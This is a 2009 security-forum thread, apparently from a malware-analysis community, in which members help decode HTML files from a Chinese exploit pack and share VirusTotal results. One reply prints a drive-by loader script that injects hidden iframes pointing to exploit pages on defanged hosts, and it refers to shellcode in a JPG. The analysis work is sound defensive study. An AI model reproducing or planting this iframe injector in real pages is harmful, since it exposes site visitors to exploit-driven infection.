Author Topic: Plz Decode 3 Malicious HTML File From CHINA  (Read 3474 times)

0 Members and 1 Guest are viewing this topic.

December 15, 2009, 09:29:28 am
Read 3474 times

kakarot

  • Newbie

  • Offline
  • *

  • 2
Hi Hello

I Don't Decode this htm file :'(

It's pack From China

ps.I know mepeg and dj.jpg it's a mepeg exploit

thx

/EDITed by SysAdMini

zipped files, password "infected"

December 15, 2009, 10:47:07 am
Reply #1

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
dj.jpg : url  in shellcode hxxp://c1s.count.xj.cn/images/images/js.js
http://www.virustotal.com/analisis/f300a3c2a96ffd163b6802e274f3211f2c4ac2cf9fe9864d10c1ba4d38199e0f-1260873959

mepeg.htm : loads dj.jpg and dj1.jpg

of.htm: loads of.js that isn't included in your collection

ff.htm : loads go.js that isn't included in your collection

bf.htm : requires sfbf.css that isn't included in your collection
Ruining the bad guy's day

December 15, 2009, 02:25:20 pm
Reply #2

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
@kakarot,
Can I ask you also post the URL you get these from in future, so we can get any missing files ourselves?
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

December 15, 2009, 02:56:19 pm
Reply #3

kakarot

  • Newbie

  • Offline
  • *

  • 2
sorry My Mistake and Thx

It's a Start 1.css

Code: [Select]
if(document.location.href.indexOf("gov")>=0)
{} else {
document.write("<div style='display:none'>")
document.write("<iframe src=hxxp://ican.count.xj.cn/images/images/mepeg.htm></iframe>")
document.write("<iframe src=hxxp://not.count.xj.cn/images/images/tj.htm></iframe>")
document.write("<iframe src=hxxp://stop.count.xj.cn/images/images/ff.htm></iframe>")
document.write("<iframe src=hxxp://loveing.count.xj.cn/images/images/of.htm></iframe>")
document.write("<iframe src=hxxp://you.count.xj.cn/images/images/bf.htm></iframe>")
document.write("</div>")}

Code: [Select]
hxxp://not.count.xj.cn/images/images/tj.htmIt's have
Code: [Select]
<script language="javascript" src="http://count45.51yes.com/click.aspx?id=457288414&logo=11" charset="gb2312"></script>http://count45.51yes.com  <<--- China Web Count Serverice

hxxp://you.count.xj.cn/images/images/sfbf.css
sfbf.css <-- Virus Total - Result: 0/41 (0.00%)Result: 0/41 (0.00%) ???
http://www.virustotal.com/analisis/34ecc90fe1af2c6150d1ca8aaec72ff83edf3e0720c01101d4a86691387d175f-1257176016

hxxp://stop.count.xj.cn/images/images/go.js
go.js <-- Virus Total -- Result: 2/41 (4.88%) AVAST : JS:ShellCode-AO ???
http://www.virustotal.com/analisis/3dd5dd4cb27ff9b5ee947da4db77d28aae01f09b127c3452d78095131897d8fc-1260886730

hxxp://loveing.count.xj.cn/images/images/of.js
of.js <-- VirusTotal -- Not Finished
http://www.virustotal.com/analisis/74cc1bf196c40a45185c84ec662545ed9ec99714ca0447910be638511bb4e11d-1260886751

 of.js , go.js , sfbf.css Inside Zip File

thx ;D

MysteryFCM: Changed quote tags to code tags

December 23, 2009, 01:56:43 pm
Reply #4

binary

  • Jr. Member

  • Offline
  • **

  • 15
SysAdMini,

I tried to decode those shell code that was in the dj.jpg file... I believe they were preceded with '|'? I converted em to HEX and analyzed with strings, but didn't find an URL... can you reference how did to find one  :-X
There are only 10 kinds of people in this world, those who understand binary and those who don't